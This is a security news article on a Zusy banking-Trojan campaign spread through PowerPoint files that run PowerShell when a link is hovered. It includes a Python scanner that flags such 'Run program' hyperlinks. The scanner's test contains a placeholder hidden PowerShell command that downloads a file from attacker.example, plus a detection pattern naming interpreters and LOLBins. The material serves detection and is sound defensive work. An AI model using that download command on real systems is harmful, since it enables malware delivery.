Cybercriminals commonly deliver malware through specially crafted Microsoft Office files, particularly Word documents, attached to spam emails. These attacks typically rely on social engineering to trick the targeted user into enabling the VBA macros embedded in the document.
The malicious PowerPoint files used in this campaign distribute a banking Trojan called ‘Zusy,’ which targets financial websites. The files, named “order.ppsx” or “invoice.ppsx,” have been distributed via spam emails with subject lines such as “Purchase Order #130527” and “Confirmation.”
Unlike macro-based attacks, the malicious PowerShell code hidden inside the document is triggered when the victim merely moves or hovers the mouse pointer over a link, without clicking it; the code then downloads an additional payload onto the victim’s machine.
When the malicious PowerPoint file is opened, it shows a screen with a single link that says “Loading…Please wait”.
When the user hovers the mouse pointer over the link, even without clicking it, PowerPoint attempts to execute the PowerShell code as an external program. The code does not run automatically as soon as the file is opened, however: the Protected View security feature, which is enabled by default in most supported versions of Office, including Office 2013 and Office 2010, displays a severe warning and prompts the user to enable or disable the content.
If the user ignores this warning and enables the content, the PowerShell code runs and contacts the domain “cccn.nl”. A file is downloaded from that domain and executed, and it in turn delivers a new variant of the banking Trojan known as Zusy, also called Tinba or Tiny Banker.
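The hover trigger described above is not a macro; it is a PowerPoint hyperlink action stored in the deck’s slide XML. A .ppsx is a zip archive, and a hyperlink on a text run is recorded as an `hlinkClick` (click) or `hlinkMouseOver` (hover) element, with PowerPoint’s “Run program” action encoded as `action="ppaction://program"` and the command line itself stored as an external relationship target in the slide’s `.rels` part. The following scanner, added here as an example and not code from the article or from SentinelOne, unpacks a deck and reports every hyperlink that runs a program or points at a command interpreter. It goes beyond the hover case in the text by checking click-triggered actions as well. The sample deck it builds is constructed for the test and contains only the parts the scanner reads; the PowerShell command line and the download URL in it are placeholders, not the campaign’s real ones.

```python
import html
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces used by PresentationML slides and package relationships.
NS = {
    "a": "http://schemas.openxmlformats.org/drawingml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "rel": "http://schemas.openxmlformats.org/package/2006/relationships",
}
R_ID = "{%s}id" % NS["r"]

# A hyperlink on a text run is either a click action (hlinkClick) or a
# mouse-over action (hlinkMouseOver). PowerPoint encodes its "Run program"
# action as action="ppaction://program"; the command line is stored as an
# external relationship target in the slide's .rels part.
HLINK_TAGS = ("hlinkClick", "hlinkMouseOver")
PROGRAM_ACTION = "ppaction://program"
# Interpreters and LOLBins that should never be a hyperlink target in a deck.
SUSPICIOUS_TARGET = re.compile(
    r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32|certutil", re.I)


def _slide_rels(zf, slide_name):
    """Map relationship Id -> (Target, TargetMode) for one slide part."""
    rels_name = "ppt/slides/_rels/%s.rels" % slide_name.rsplit("/", 1)[-1]
    if rels_name not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read(rels_name))
    return {rel.get("Id"): (rel.get("Target", ""), rel.get("TargetMode", "Internal"))
            for rel in root.findall("rel:Relationship", NS)}


def scan_pptx(data: bytes):
    """Return (slide part, trigger element, action, target) for every hyperlink
    that runs a program or resolves to a suspicious external command line."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        slides = [n for n in zf.namelist() if re.fullmatch(r"ppt/slides/slide\d+\.xml", n)]
        for slide in sorted(slides):
            rels = _slide_rels(zf, slide)
            root = ET.fromstring(zf.read(slide))
            for tag in HLINK_TAGS:
                for el in root.iter("{%s}%s" % (NS["a"], tag)):
                    action = el.get("action", "")
                    target, mode = rels.get(el.get(R_ID), ("", "Internal"))
                    if action == PROGRAM_ACTION or (mode == "External" and SUSPICIOUS_TARGET.search(target)):
                        findings.append((slide, tag, action, target))
    return findings


def build_sample_ppsx(target, trigger="hlinkMouseOver", action=PROGRAM_ACTION):
    """Constructed, minimal deck for testing: one slide whose text run carries the
    given hyperlink. Only the parts the scanner reads are included, so PowerPoint
    itself would not open this file."""
    action_attr = ' action="%s"' % action if action else ""
    slide_xml = """<?xml version="1.0" encoding="UTF-8"?>
<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"
       xmlns:a="%s" xmlns:r="%s">
  <p:cSld><p:spTree><p:sp><p:txBody><a:p><a:r>
    <a:rPr lang="en-US"><a:%s r:id="rId2"%s/></a:rPr>
    <a:t>Loading...Please wait</a:t>
  </a:r></a:p></p:txBody></p:sp></p:spTree></p:cSld>
</p:sld>""" % (NS["a"], NS["r"], trigger, action_attr)
    rels_xml = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="%s">
  <Relationship Id="rId2" Type="%s/hyperlink" Target="%s" TargetMode="External"/>
</Relationships>""" % (NS["rel"], NS["r"], html.escape(target, quote=True))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", slide_xml)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


# Placeholder download-and-run command line in the style of the campaign;
# the URL and file names are stand-ins, not the real indicators.
SAMPLE_COMMAND = ('powershell -NoP -NonI -W Hidden -Exec Bypass -c '
                  '"(New-Object Net.WebClient).DownloadFile(\'http://attacker.example/c.php\','
                  '\'%TEMP%\\ii.jse\')"')

if __name__ == "__main__":
    for slide, trigger, action, target in scan_pptx(build_sample_ppsx(SAMPLE_COMMAND)):
        print("%s: <a:%s action=%r> -> %s" % (slide, trigger, action, target))
    benign = build_sample_ppsx("https://www.example.com/", trigger="hlinkClick", action="")
    print("benign deck findings:", scan_pptx(benign))
```

To run it against a real sample, pass `open("order.ppsx", "rb").read()` to `scan_pptx`; an ordinary web hyperlink produces no finding, while any `ppaction://program` action, hover or click, is reported together with the exact command line it would launch.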
The security researchers also pointed out that the attack does not work if the malicious presentation is opened with PowerPoint Viewer, and that most versions of Office warn the user before the code is executed, but that the method could still be effective in some cases.
“Users might still somehow enable external programs because they’re lazy, in a hurry, or they’re only used to blocking macros. Also, some configurations may possibly be more permissive in executing external programs than they are with macros,” SentinelOne Labs said in a blog post.